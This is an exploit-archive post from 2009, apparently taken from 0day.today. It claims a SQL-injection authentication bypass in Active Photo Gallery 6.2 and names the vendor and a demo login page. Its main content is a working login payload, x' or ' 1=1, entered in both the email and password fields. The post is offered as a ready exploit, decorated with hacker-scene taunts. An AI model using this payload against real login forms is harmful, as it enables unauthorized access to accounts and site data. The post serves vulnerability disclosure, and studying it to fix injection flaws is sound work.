id: 10310
date: 12/17/2009
title: Active Photo Gallery v 6.2 (Auth Bypass) Remote SQL Injection
author: R3d-D3v!L
cves: 

=============================================================
Active Photo Gallery v 6.2 (Auth Bypass) Remote SQL Injection
=============================================================

[?] ?????????????????????????{In The Name Of Allah The Mercifull}??????????????????????
[?]
[~] Tybe: (Auth Bypass) Remote SQL Injection Vulnerability&#8207;
[?]
[~] Vendor: www.activewebsoftwares.com
[?]
[?] Software: Active Photo Gallery v 6.2
[?]
[?] author: ((R3d-D3v!L))
[?]
[?] Date: 17.dec.2009
[?] T!ME: 10:22 pm
[?]??????????????????????{DEV!L'5 of SYST3M}??????????????????
 
 
[?] Exploit:
 
 
 
[?] E-/\/\A!L : x' or ' 1=1
 
[?] password  : x' or ' 1=1
 
 
 
[?]demo:
 
 
[?]https://server/demoactivephotogallery/account.asp
 
 
 
N073:
REAL RED DEV!L W@S h3r3 LAMERZ
 
GAZA !N our hearts !



#  0day.today [2023-03-21]  #